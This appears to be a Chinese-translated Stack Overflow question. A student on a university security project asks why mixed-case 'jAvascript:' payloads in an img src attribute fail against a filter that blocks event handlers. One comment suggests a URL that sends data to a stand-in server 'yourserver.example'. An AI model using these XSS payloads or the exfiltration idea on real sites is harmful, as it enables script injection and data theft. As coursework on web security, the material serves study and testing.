【发布时间】:2015-08-06 04:25:56
【问题描述】:
我必须为一个与安全相关的大学项目进行 XSS 攻击。我想存储在其源属性中包含恶意代码的图像。但是,似乎我无权从 src 属性访问任何 javascript 对象。
以下是我尝试过的一些事情:
<img src="jAvascript:alert('XSS')">
抛出:未定义参考错误警报。
<img src="jAvascript:window.alert('XSS')">
抛出:未定义参考错误窗口
<img src="jAvascript:var x = new XMLHttpRequest();">
抛出:引用错误 XMLHttpRequest 未定义
这里有什么问题,如何访问网站的主窗口和我要访问的对象?
编辑: 过滤掉 Onerror 和所有其他事件。
【问题讨论】:
-
这条评论并不是很有帮助。为什么不执行?并且错误意味着它被执行了。
-
你能做类似
javascript:'http//yourserver.example?js='+Object的事情吗(看看你的服务器上有什么)? -
并非所有浏览器都容易受到这种攻击。您针对/测试什么浏览器 -stackoverflow.com/questions/1798633/…
-
我在 Firefox 上测试。
-
无法通过img的src属性执行Javascript代码。 (我假设引号是编码的)。你也读过这个吗? stackoverflow.com/questions/1798633/…
标签: javascript security xss